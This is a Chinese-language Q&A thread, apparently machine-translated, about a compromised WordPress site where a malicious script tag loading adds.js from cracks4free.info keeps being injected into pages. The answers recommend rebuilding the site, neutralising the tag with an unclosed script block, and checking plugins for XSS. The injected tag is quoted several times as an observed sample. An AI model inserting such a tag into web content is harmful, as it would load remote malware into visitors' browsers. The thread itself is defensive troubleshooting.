防止恶意软件javascript执行

Question

我正在使用wordpress网站，并且我发现了恶意软件脚本，每当我尝试保存页面并单击所见即所得中的文本面板时，恶意软件的javascript标记都会自动添加到页面中。这里是自动添加的脚本。

<script type="text/javascript" src="http://cracks4free.info/5/adds.js" async=""></script> 

我试图通过下面的代码删除src文件。但它不起作用，该脚本在body标签关闭之前最后执行。我试过使用这个脚本，但恶意软件脚本在所有的JavaScript加载后加载。这是我的代码。

<script type="text/javascript"> 
$("script[src='http://cracks4free.info/5/adds.js']").remove() 
</script> 

我需要删除该代码，或阻止这种代码通过javasript，jQuery的AJAX任何执行..只是想摆脱这一点。由于

Answer 1

如果您的服务器被入侵，你需要重建它：

1. 出口现有的内容
2. 重建盒与最新的WordPress版本
3. 导入您的内容
4. 定期应用安全更新

试图使用JavaScript清理内容不是一个解决方案。你有一个妥协的WordPress的安装，这是一个其他脚本kiddy添加自己的个人风格的时间问题，或发生更糟糕的事情。

Answer 2

您可以将恶意脚本之前权注入新的脚本标签开始通过JavaScript执行：基本上这里

document.write("<script type='application/x-suppress'>"); 

你开始一个新的<script>块，但没有完成它，假设接下来要做的是偏偏就是恶意软件插入它的块在最后

<script type="text/javascript" src="http://cracks4free.info/5/adds.js" async=""></script> 

最终的结果最终会被

<script type='application/x-suppress'><script type="text/javascript" src="http://cracks4free.info/5/adds.js" async=""></script> 

会发生什么事是浏览器会看到第一个<script>标签，并期望其中的所有内容都是JavaScript代码。当它试图解析脚本（<script type="text/javascript" src="http://cracks4free.info/5/adds.js" async="">）时，它会导致JavaScript解析错误，而不会执行任何操作。最后，您的<script>区块将通过您的恶意软件提供的</script>关闭。

真正的问题是，为什么你有这个恶意软件，你怎么能摆脱它？而不是试图解决它。

Answer 3

看起来像你的一个WordPress插件可以用于XSS（跨站脚本），我建议你扫描一下这个插件的漏洞。 您可以自己扫描插件的源代码，以便盲目向用户返回javascript，但不会正确转义它。

你应该遵循Hamish的建议，我的建议只是包含在这里，所以你不会重新安装有问题的插件。